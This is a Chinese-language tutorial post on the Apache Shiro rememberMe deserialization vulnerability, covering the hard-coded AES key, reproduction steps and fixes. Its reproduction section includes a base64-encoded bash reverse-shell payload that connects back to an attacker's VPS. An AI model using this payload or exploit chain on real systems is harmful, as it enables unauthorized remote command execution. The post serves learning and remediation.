Shiro是一个Java安全框架,简化了认证、授权、加密和会话管理。文章介绍了Shiro的身份认证流程,以及一个1.2.4以前版本存在的反序列化漏洞,该漏洞源于未过滤的反序列化操作和硬编码的AES密钥。攻击者可以构造恶意对象触发远程代码执行。修复措施包括升级到1.2.5及以上版本,自定义密钥等。
一、Shiro简介
Shiro是一个强大的简单易用的Java安全框架,主要用来更便捷的认证,授权,加密,会话管理。
Shiro首要的和最重要的目标就是容易使用并且容易理解。
2016年,网络中曝光1.2.4以前的版本存在反序列化漏洞。
二、shiro的身份认证工作流程
- 通过前端传入的值
- 获取rememberMe cookie
- base64加密
- AES加密 (对称加解密)
- 反序列化
三、漏洞原理
Apache Shiro框架提供了一个记住我的功能,这个功能在用户登录成功之后,会生成一个加密后的cookie。其中记住我的RememberMe就是cookie中的key。cookie的值是对相关信息进过序列化,再进行aes加密,再使用base64编码之后形成的。
服务端接收cookie值时,也是按照以下步骤解析的:
1、检索RememberMe cookie的值
2、base64解码
3、使用aes解码(加密密钥硬编码)
4、进行反序列化操作(未做过滤处理)
在调用反序列化时未进行任何过滤,导致可以触发远程代码执行漏洞。
AES的密钥Key被硬编码在代码里,意味着每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终造成反序列化漏洞。
四、shiro漏洞复现
(1)开启环境,抓包判断是否是shiro框架
在cookie后边加上rememberMe=1,如果回复包出现rememberMe=deleteMe,说明他就是shiro框架
(2)获取key值,因为key值在源码中,所以需要使用工具获取
(3)爆破利用链
(4)执行反序列化漏洞命令执行
(5)利用shrio反弹shell
payload:bash -c {echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4OC40NC4xNzAvODg4OCAwPiYx}|{base64,-d}|{bash,-i} //需要修改为vps的地址在进行base64加密
监听端口:
(5)使用另外一个工具进行爆破
由于工具失效了就不演示了
五、shiro反序列化漏洞的修复
- 删除代码里的默认密钥
- 默认配置里注释了默认密钥
- 升级shiro到1.2.5及以上
- 如果在配置里配置了密钥,那么请一定不要使用网上的密钥,一定不要!!
- 请自己base64一个AES的密钥,或者利用官方提供的方法生成密钥:org.apache.shiro.crypto.AbstractSymmetricCipherService#generateNewKey()
扫一扫
1238
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
